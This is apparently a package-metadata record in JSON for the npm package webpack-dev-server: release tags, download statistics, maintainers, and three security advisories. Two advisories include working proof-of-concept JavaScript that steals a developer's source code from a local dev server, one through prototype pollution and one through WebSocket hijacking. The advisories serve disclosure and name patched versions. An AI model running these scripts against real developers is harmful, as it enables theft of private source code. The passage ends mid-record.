0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.6/manifests"},{"name":"v2.1.0-beta.5","sha":"2eebcfd4f050bb2b86149c881f07d4ea111ad09c","kind":"tag","published_at":"2016-09-21T10:29:59.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.5/manifests"},{"name":"v1.16.1","sha":"8ecb9a4d1f1b2046db8305c45de178fe1c15131f","kind":"tag","published_at":"2016-09-18T09:01:13.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.16.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"6b712fa7bbd8e3814eff04561f17e43009932150","kind":"tag","published_at":"2016-09-17T21:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.16.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.16.0/manifests"},{"name":"v1.15.2","sha":"0611792daa5aebcb8a024476c464ee49920228ac","kind":"tag","published_at":"2016-09-14T13:44:48.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.15.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.15.2/manifests"},{"name":"v2.1.0-beta.4","sha":"8d286b1dcae851a83884a0f0cd576d95a86c8b4a","kind":"tag","published_at":"2016-09-08T14:26:40.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"6c3250e760360db2f162dbc184dd19c9a11ab2e3","kind":"tag","published_at":"2016-09-06T08:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.3/manifests"},{"name":"v1.15.1","sha":"2f3163befa7378de56e22a23c9d70ab4af470585","kind":"tag","published_at":"2016-08-31T21:33:44.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.15.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.15.1/manifests"},{"name":"v2.1.0-beta.2","sha":"4cdb14c9f533b4d946fd2a1cb5e5a3cefc109e5a","kind":"tag","published_at":"2016-08-31T21:30:31.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"66067171b7c50b5837659de634e4c1b3c4d192a7","kind":"tag","published_at":"2016-08-31T14:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.1/manifests"},{"name":"v1.15.0","sha":"f1ce64f848bf5165b457fbdfff4cc5432b1f313a","kind":"tag","published_at":"2016-08-22T11:49:46.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.15.0/manifests"},{"name":"v2.1.0-beta.0","sha":"dd61b9930fdfa49b96ce3ecdd6ec668b99d7ac80","kind":"tag","published_at":"2016-05-15T22:46:45.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.1.0-beta.0/manifests"},{"name":"v2.0.0-beta","sha":"3dd3e2abfe2f914764a7e89bda5b7bee9f31bd84","kind":"tag","published_at":"2016-01-21T20:34:48.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v2.0.0-beta/manifests"},{"name":"v1.14.1","sha":"eae3a0c73fb847521b42ac2accae1c0906dd6023","kind":"tag","published_at":"2016-01-11T20:40:56.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.14.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"0cc94c07b93b234503de43c64e6e9cef801224cc","kind":"tag","published_at":"2015-11-24T19:51:00.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.14.0/manifests"},{"name":"v1.13.0","sha":"b090b6659b480135d8b6cde3f2cb4466713b711b","kind":"tag","published_at":"2015-11-24T19:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.13.0/manifests"},{"name":"v1.12.1","sha":"24b356ec1610ea6d7033b3e01bb7b09429612ba5","kind":"tag","published_at":"2015-10-18T22:03:16.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"c52035ef0664fecc74a4a0dc481e39c523426f88","kind":"tag","published_at":"2015-09-25T14:07:20.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"30d0cc9e7c3eb5485242867a49388b0b265f148d","kind":"tag","published_at":"2015-09-15T07:53:28.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.11.0/manifests"},{"name":"v1.10.1","sha":"8fddb2adbf71582d4728d85021a32bd3175571c4","kind":"tag","published_at":"2015-06-28T06:31:08.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"6ba377a0cea7c36b95d9355b1ed306406b63e808","kind":"tag","published_at":"2015-06-27T21:19:38.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.10.0/manifests"},{"name":"v1.9.0","sha":"8e8f540b2f7b35f7b6c3ce616a7fd2215aaa6eea","kind":"tag","published_at":"2015-05-21T20:29:08.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.9.0/manifests"},{"name":"v1.8.2","sha":"242cf1206dbbd0be35d41fecc47c7eb2d7eecc45","kind":"tag","published_at":"2015-04-21T06:48:44.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"93a8701d1e4515fb1cfb0951006e448cb6cf24e4","kind":"tag","published_at":"2015-04-20T19:40:02.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"dd6da4fc827aa236b3c69687eb55b9a72d7e955b","kind":"tag","published_at":"2015-03-28T16:35:08.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.8.0/manifests"},{"name":"v1.7.0","sha":"206a0ad5cf3abfb14468adb0ec910fc18fa0a6d2","kind":"commit","published_at":"2014-12-23T07:05:47.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v1.7.0/manifests"}]},"repo_metadata_updated_at":"2025-06-06T04:32:55.142Z","dependent_packages_count":90823,"downloads":63904191,"downloads_period":"last-month","dependent_repos_count":2955806,"rankings":{"downloads":0.032582003289413346,"dependent_repos_count":0.00602356363333692,"dependent_packages_count":0.001013053883788482,"stargazers_count":1.1455175240525002,"forks_count":1.0200631214709104,"docker_downloads_count":0.04367083634169267,"average":0.374811683778607},"purl":"pkg:npm/webpack-dev-server","advisories":[{"uuid":"GSA_kwCzR0hTQS00djl2LWhmcTQtcm0yds4ABIpK","url":"https://github.com/advisories/GHSA-4v9v-hfq4-rm2v","title":"webpack-dev-server users' source code may be stolen when they access a malicious web site","description":"### Summary\nSource code may be stolen when you access a malicious web site.\n\n### Details\nBecause the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `\u003cscript src=\"http://localhost:8080/main.js\"\u003e` in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables.\nBy using `Function::toString` against the values in `__webpack_modules__`, the attacker can get the source code.\n\n### PoC\n1. Download [reproduction.zip](https://github.com/user-attachments/files/18426585/reproduction.zip) and extract it\n2. Run `npm i`\n3. Run `npx webpack-dev-server`\n4. Open `https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/`\n5. You can see the source code output in the document and the devtools console.\n\n![image](https://github.com/user-attachments/assets/9d4dcdca-5d24-4c84-a7b4-feb1782bca09)\n\nThe script in the POC site is:\n```js\nlet moduleList\nconst onHandlerSet = (handler) =\u003e {\n  console.log('h', handler)\n  moduleList = handler.require.m\n}\n\nconst originalArrayForEach = Array.prototype.forEach\nArray.prototype.forEach = function forEach(callback, thisArg) {\n  callback((handler) =\u003e {\n    onHandlerSet(handler)\n  })\n  originalArrayForEach.call(this, callback, thisArg)\n  Array.prototype.forEach = originalArrayForEach\n}\n\nconst script = document.createElement('script')\nscript.src = 'http://localhost:8080/main.js'\nscript.addEventListener('load', () =\u003e {\n  console.log(moduleList)\n  for (const key in moduleList) {\n    const p = document.createElement('p')\n    const title = document.createElement('strong')\n    title.textContent = key\n    const code = document.createElement('code')\n    code.textContent = moduleList[key].toString()\n    p.append(title, ':', document.createElement('br'), code)\n    document.body.appendChild(p)\n  }\n})\ndocument.head.appendChild(script)\n```\n\nThis script uses the function generated by [`renderRequire`](https://github.com/webpack/webpack/blob/3919c844eca394d73ca930e4fc5506fb86e2b094/lib/javascript/JavascriptModulesPlugin.js#L1383).\n```js\n    // The require function\n    function __webpack_require__(moduleId) {\n        // Check if module is in cache\n        var cachedModule = __webpack_module_cache__[moduleId];\n        if (cachedModule !== undefined) {\n            return cachedModule.exports;\n        }\n        // Create a new module (and put it into the cache)\n        var module = __webpack_module_cache__[moduleId] = {\n            // no module.id needed\n            // no module.loaded needed\n            exports: {}\n        };\n        // Execute the module function\n        var execOptions = {\n            id: moduleId,\n            module: module,\n            factory: __webpack_modules__[moduleId],\n            require: __webpack_require__\n        };\n        __webpack_require__.i.forEach(function(handler) {\n            handler(execOptions);\n        });\n        module = execOptions.module;\n        execOptions.factory.call(module.exports, module, module.exports, execOptions.require);\n        // Return the exports of the module\n        return module.exports;\n    }\n```\nEspecially, it uses the fact that `Array::forEach` is called for `__webpack_require__.i` and `execOptions` contains `__webpack_require__`.\nIt uses prototype pollution against `Array::forEach` to extract `__webpack_require__` reference.\n\n### Impact\nThis vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.\n\n\u003cdetails\u003e\n\u003csummary\u003eOld content\u003c/summary\u003e\n\n### Summary\nSource code may be stolen when you use [`output.iife: false`](https://webpack.js.org/configuration/output/#outputiife) and access a malicious web site.\n\n### Details\nWhen `output.iife: false` is set, some global variables for the webpack runtime are declared on the `window` object (e.g. `__webpack_modules__`).\nBecause the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `\u003cscript src=\"http://localhost:8080/main.js\"\u003e` in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on the `window` object.\nBy using `Function::toString` against the values in `__webpack_modules__`, the attacker can get the source code.\n\nI pointed out `output.iife: false`, but if there are other options that makes the webpack runtime variables to be declared on the `window` object, the same will apply for those cases.\n\n### PoC\n1. Download [reproduction.zip](https://github.com/user-attachments/files/18409777/reproduction.zip) and extract it\n2. Run `npm i`\n3. Run `npx webpack-dev-server`\n4. Open `https://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/`\n5. Open the devtools console.\n6. You can see the content of `src/index.js` and other scripts loaded.\n\n![image](https://github.com/user-attachments/assets/87801607-57bb-4656-bc0d-2bfbe207f436)\n\nThe script in the POC site is:\n```js\nconst script = document.createElement('script')\nscript.src = 'http://localhost:8080/main.js'\nscript.addEventListener('load', () =\u003e {\n    for (const module in window.__webpack_modules__) {\n        console.log(`${module}:`, window.__webpack_modules__[module].toString())\n    }\n})\ndocument.head.appendChild(script)\n```\n\n### Impact\nThis vulnerability can result in the source code to be stolen for users that has `output.iife: false` option set and uses a predictable port and output path for the entrypoint script.\n\n\u003c/details\u003e","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:09:13.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-4v9v-hfq4-rm2v","https://nvd.nist.gov/vuln/detail/CVE-2025-30359","https://github.com/webpack/webpack-dev-server/commit/5c9378bb01276357d7af208a0856ca2163db188e","https://github.com/advisories/GHSA-4v9v-hfq4-rm2v"],"source_kind":"github","identifiers":["GHSA-4v9v-hfq4-rm2v","CVE-2025-30359"],"repository_url":"https://github.com/webpack/webpack-dev-server","blast_radius":0.0,"packages":[{"versions":[{"first_patched_version":"5.2.1","vulnerable_version_range":"\u003c= 5.2.0"}],"ecosystem":"npm","package_name":"webpack-dev-server"}],"created_at":"2025-06-04T22:08:13.468Z","updated_at":"2025-06-04T21:09:13.000Z","epss_percentage":0.00031,"epss_percentile":0.07216},{"uuid":"GSA_kwCzR0hTQS05amdnLTg4bWMtOTcyaM4ABIpL","url":"https://github.com/advisories/GHSA-9jgg-88mc-972h","title":"webpack-dev-server users' source code may be stolen when they access a malicious web site with non-Chromium based browser","description":"### Summary\nSource code may be stolen when you access a malicious web site with non-Chromium based browser.\n\n### Details\nThe `Origin` header is checked to prevent Cross-site WebSocket hijacking from happening which was reported by CVE-2018-14732.\nBut webpack-dev-server always allows IP address `Origin` headers.\nhttps://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127\nThis allows websites that are served on IP addresses to connect WebSocket.\nBy using the same method described in [the article](https://blog.cal1.cn/post/Sniffing%20Codes%20in%20Hot%20Module%20Reloading%20Messages) linked from CVE-2018-14732, the attacker get the source code.\n\nrelated commit: https://github.com/webpack/webpack-dev-server/commit/72efaab83381a0e1c4914adf401cbd210b7de7eb (note that `checkHost` function was only used for Host header to prevent DNS rebinding attacks so this change itself is fine.\n\nThis vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due to [the non-HTTPS private access blocking feature](https://developer.chrome.com/blog/private-network-access-update#chrome_94).\n\n### PoC\n1. Download [reproduction.zip](https://github.com/user-attachments/files/18418233/reproduction.zip) and extract it\n2. Run `npm i`\n3. Run `npx webpack-dev-server`\n4. Open `http://{ipaddress}/?target=http://localhost:8080\u0026file=main` with a non-Chromium browser (I used Firefox 134.0.1)\n5. Edit `src/index.js` in the extracted directory\n6. You can see the content of `src/index.js`\n\n![image](https://github.com/user-attachments/assets/7ce3cad7-1a4d-4778-baae-1adae5e93ba4)\n\nThe script in the POC site is:\n```js\nwindow.webpackHotUpdate = (...args) =\u003e {\n    console.log(...args);\n    for (i in args[1]) {\n        document.body.innerText = args[1][i].toString() + document.body.innerText\n\t    console.log(args[1][i])\n    }\n}\n\nlet params = new URLSearchParams(window.location.search);\nlet target = new URL(params.get('target') || 'http://127.0.0.1:8080');\nlet file = params.get('file')\nlet wsProtocol = target.protocol === 'http:' ? 'ws' : 'wss';\nlet wsPort = target.port;\nvar currentHash = '';\nvar currentHash2 = '';\nlet wsTarget = `${wsProtocol}://${target.hostname}:${wsPort}/ws`;\nws = new WebSocket(wsTarget);\nws.onmessage = event =\u003e {\n    console.log(event.data);\n    if (event.data.match('\"type\":\"ok\"')) {\n        s = document.createElement('script');\n        s.src = `${target}${file}.${currentHash2}.hot-update.js`;\n        document.body.appendChild(s)\n    }\n    r = event.data.match(/\"([0-9a-f]{20})\"/);\n    if (r !== null) {\n        currentHash2 = currentHash;\n        currentHash = r[1];\n        console.log(currentHash, currentHash2);\n    }\n}\n```\n\n### Impact\nThis vulnerability can result in the source code to be stolen for users that uses a predictable port and uses a non-Chromium based browser.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:09:38.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-9jgg-88mc-972h","https://nvd.nist.gov/vuln/detail/CVE-2025-30360","https://github.com/webpack/webpack-dev-server/commit/72efaab83381a0e1c4914adf401cbd210b7de7eb","https://github.com/webpack/webpack-dev-server/commit/d2575ad8dfed9207ed810b5ea0ccf465115a2239","https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127","https://github.com/advisories/GHSA-9jgg-88mc-972h"],"source_kind":"github","identifiers":["GHSA-9jgg-88mc-972h","CVE-2025-30360"],"repository_url":"https://github.com/webpack/webpack-dev-server","blast_radius":0.0,"packages":[{"versions":[{"first_patched_version":"5.2.1","vulnerable_version_range":"\u003c= 5.2.0"}],"ecosystem":"npm","package_name":"webpack-dev-server"}],"created_at":"2025-06-04T22:08:12.967Z","updated_at":"2025-06-04T21:09:39.000Z","epss_percentage":0.00015,"epss_percentile":0.02062},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWNmNjYteHdmcC1ndmM0","url":"https://github.com/advisories/GHSA-cf66-xwfp-gvc4","title":"Missing Origin Validation in webpack-dev-server","description":"Versions of `webpack-dev-server` before 3.1.10 are missing origin validation on the websocket server. This vulnerability allows a remote attacker to steal a developer's source code because the origin of requests to the websocket server that is used for Hot Module Replacement (HMR) are not validated.\n\n\n## Recommendation\nFor `webpack-dev-server` update to version 3.1.11 or later.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2019-01-04T17:40:59.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://nvd.nist.gov/vuln/detail/CVE-2018-14732","https://github.com/webpack/webpack-dev-server/commit/f18e5adf123221a1015be63e1ca2491ca45b8d10","https://www.npmjs.com/advisories/725","https://github.com/webpack/webpack-dev-server/issues/1445","https://github.com/webpack/webpack-dev-server/blob/master/CHANGELOG.md#3111-2018-12-21","https://github.com/webpack/webpack-dev-server/issues/1620","https://github.com/advisories/GHSA-cf66-xwfp-gvc4"],"source_kind":"github","identifiers":["GHSA-cf66-xwfp-gvc4","CVE-2018-14732"],"repository_url":"https://github.com/webpack/webpack-dev-server","blast_radius":0.0,"packages":[{"versions":[{"first_patched_version":"3.1.11","vulnerable_version_range":"\u003c 3.1.11"}],"ecosystem":"npm","package_name":"webpack-dev-server"}],"created_at":"2022-12-21T16:13:32.181Z","updated_at":"2023-01-09T05:03:00.000Z","epss_percentage":0.00393,"epss_percentile":0.59421}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack-dev-server","docker_dependents_count":11036,"docker_downloads_count":3041820900,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack-dev-server","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack-dev-server/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":true,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-dev-server/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-dev-server/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-dev-server/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-dev-server/related_packages","maintainers":[{"uuid":"sokra","login":"sokra","name":null,"email":"tobias.koppers@googlemail.com","url":null,"packages_count":97,"html_url":"https://www.npmjs.com/~sokra","role":null,"created_at":"2022-11-10T11:25:48.549Z","updated_at":"2022-11-10T11:25:48.549Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sokra/packages"},{"uuid":"jhnns","login":"jhnns","name":null,"email":"mail@johannesewald.de","url":null,"packages_count":131,"html_url":"https://www.npmjs.com/~jhnns","role":null,"created_at":"2022-11-10T11:25:48.551Z","updated_at":"2022-11-10T11:25:48.551Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/jhnns/packages"},{"uuid":"evilebottnawi","login":"evilebottnawi","name":null,"email":"sheo13666q@gmail.com","url":null,"packages_count":215,"html_url":"https://www.npmjs.com/~evilebottnawi","role":null,"created_at":"2022-11-10T11:25:48.553Z","updated_at":"2022-11-10T11:25:48.553Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/evilebottnawi/packages"},{"uuid":"hiroppy","login":"hiroppy","name":null,"email":"git@hiroppy.me","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~hiroppy","role":null,"created_at":"2022-11-10T11:25:48.555